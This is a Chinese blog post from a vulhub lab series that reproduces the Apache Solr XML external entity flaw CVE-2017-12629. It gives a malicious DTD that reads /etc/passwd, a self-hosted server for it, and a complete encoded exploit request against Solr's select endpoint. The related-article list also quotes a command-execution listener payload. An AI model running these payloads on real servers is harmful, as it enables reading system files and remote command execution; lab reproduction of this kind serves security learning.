Apache solr XML 实体注入漏洞(CVE-2017-12629)

最新推荐文章于 2024-04-01 17:37:24 发布
最新推荐文章于 2024-04-01 17:37:24 发布
阅读量493 收藏 1
点赞数
分类专栏: vulhub漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/119206614
版权

漏洞简介

Apache Solr 是一个开源的搜索服务器。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE),二者可以连接成利用链,编号均为CVE-2017-12629。
参考了这位大佬的文章:https://www.cnblogs.com/cute-puli/p/13340249.html

漏洞复现

复现这个漏洞需要搭建一个http,我这里用的python3 -m http.server 8000
然后在该网站目录下创建一个.dtd文件,内容为:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % ent "<!ENTITY data SYSTEM ':%file;'>">

在这里插入图片描述
最后修改以下包并发送即可读取passwd

GET /solr/demo/select?&q=%3C%3fxml+version%3d%221.0%22+%3f%3E%3C!DOCTYPE+root%5b%3C!ENTITY+%25+ext+SYSTEM+%22http%3a%2f%2f(你的远程服务器IP)%2f(dtd文件的名字).dtd%22%3E%25ext%3b%25ent%3b%5d%3E%3Cr%3E%26data%3b%3C%2fr%3E&wt=xml&defType=xmlparser HTTP/1.1
Host:your-ip:8983
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 2

在这里插入图片描述

小 白 萝 卜
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2017-12629Apache Solr XXE&&RCE
qq_61553520的博客
05-13 908
pache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞XML实体扩展漏洞XXE)和远程命令执行漏洞RCE)。漏洞影响版本:Apache Solr before 7.1 with Apache Lucene before 7.1。
Apache solr XML&RCE 漏洞(CVE-2017-12629)
weixin_44047654的博客
02-22 642
Apache Solr XXE & RCE 漏洞(CVE-2017-12629)
CVE-2017-12629Apache Solr RCE命令执行漏洞复现
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
02-16 4407
当攻击者可以直接访问Solr控制台时,可以通过发送类似/节点名/config的POST请求对该节点的配置文件做更改.apache solr默认继承VelocityResponseWriter插件.Apache solr远程命令执行(CVE-2019-0193).
Apache Solr 远程命令执行漏洞CVE-2017-12629
EnerY3的博客
12-12 1197
{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "touch /tmp/success"]}}:这是请求的内容,是一个JSON对象,包含一个元素。请求内容: "[{"id":"test"}]",表示要更新的文档是一个JSON数组,其中只包含一个文档,该文档的ID为"test"。
XML外部实体注入总结(XXE靶机复现)
Aiwin的博客
05-15 5317
XML外部实体注入,Vuln-XXE靶机复现和无回显XXE的使用
solr_exploit:Apache Solr远程代码执行突破(CVE-2019-0193)漏洞利用
03-10
此处提供的漏洞检测方法,文件等内容,均仅限于安全从业者在获得法律授权的情况下使用,目的是检测已授权的服务器的安全性。安全从业者遵守法律规定,禁止在没有得到授权的情况下做任何突破检测。 简介 理论上可以...
CVE-2020-13957 Apache Solr 未授权上传.md
04-13
CVE-2020-13957 Apache Solr 未授权上传
Apache Solrsolr-8.11.1-src.tgz)
01-10
标题中的"solr-8.11.1-src.tgz"表明这是Apache Solr 8.11.1版本的源代码包,适用于那些希望对Solr进行深度定制或开发的用户。 源代码发布通常包含了编译和构建Solr所需的所有文件,包括Java源代码、配置文件、测试...
apache-solr-1.4.0.zip_apache-solr _apache-solr-1.4.0_apache-solr
09-20
在压缩包"apache-solr-1.4.0"中,包含了Solr的源代码、配置文件、示例文档以及其他必要的资源。对于喜欢研究Solr的人来说,这些源代码是深入理解其工作原理、定制功能以及优化性能的重要资料。通过对这些源码的研究...
Apache Solr 漏洞总结
星落的博客
04-15 1829
Apache Solr简介 Solr是一个高性能,采用Java5开发,基于Lucene的全文搜索服务器。Solr是一个独立的企业级搜索应用服务器,很多企业运用solr开源服务。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。它的主要特性包括:高效、灵活的缓存功能,垂直搜索功能,高亮显示搜索结果,通过索引复制来提高可用性,提 供一套强大Data Schema来定义字段,类型和设置文本分析,提供基于Web的管理界面等。 环境搭建 ..
Apache Solr 远程命令执行漏洞CVE-2017-12629)复现
HEAVEN569的博客
06-21 1294
Apache Solr 远程命令执行漏洞CVE-2017-12629)复现
vulhub中Apache solr XML 实体注入漏洞复现(CVE-2017-12629
最新发布
yougexiaojiuguan的博客
04-01 730
漏洞复现过程的记录
漏洞复现】Apache系列(二)之Solr漏洞复现
qq_45244158的博客
03-01 7362
漏洞复现】Apache系列(二)之Solr漏洞复现
XXE漏洞详解(XML外部实体注入)
热门推荐
谢公子的博客
01-12 1万+
目录 XXE XXE漏洞演示利用 Blind OOB XXE 场景1 – 端口扫描 场景2 – 通过DTD窃取文件 场景3 – 远程代码执行 XXE漏洞的挖掘 XXE的防御 在学习XXE漏洞之前,我们先了解下XML。传送门——>XML和JSON数据格式 那么什么是XXE漏洞呢? XXE XXE(XML ExternalEntity Injection)也就是XML...
P4 利用XXE靶机 -XXEXML外部实体注入漏洞)复现
在下小黄的博客
03-22 558
大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 今天更新的是: P3 利用Vulnhub复现漏洞 - Apache SSI 远程命令执行漏洞 往期检索:程序设计学习笔记——目录 创建时间:2021年3月22日 软件: kali 2020.4 、Burp Suite Pro 、火狐浏览器 、XXE靶机 XXE漏洞复现环境准备 环境准备 kali配置 安装masscan : apt-get install masscan 安装gobuster: apt-g
漏洞复现】CVE-2020-29436:Nexus3 XML外部实体注入
zzgslh的博客
02-05 1403
一、 Nexus简介 Nexus Repository Manager 3是一款通用的软件包仓库管理(Universal Repository Manager)服务。 二、漏洞概述 三、漏洞复现 提示:本地搭建需要JDK1.8以上版本。 (1)下载Nexus Repository Manager 3.28.1-01环境: 链接地址:https://help.sonatype.com/repomanager3/download/download-archives—repository-manager-3 (
Apache Solr 7.4官方指南:全面配置与管理教程
Apache Solr Reference Guide 7.4 是由 Apache Lucene/Solr 项目编写的官方英文文档,于2018年6月19日发布,旨在提供全面和权威的指南,帮助用户深入了解和管理 Solr 7.4 版本。该手册覆盖了从基础概念到高级操作的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值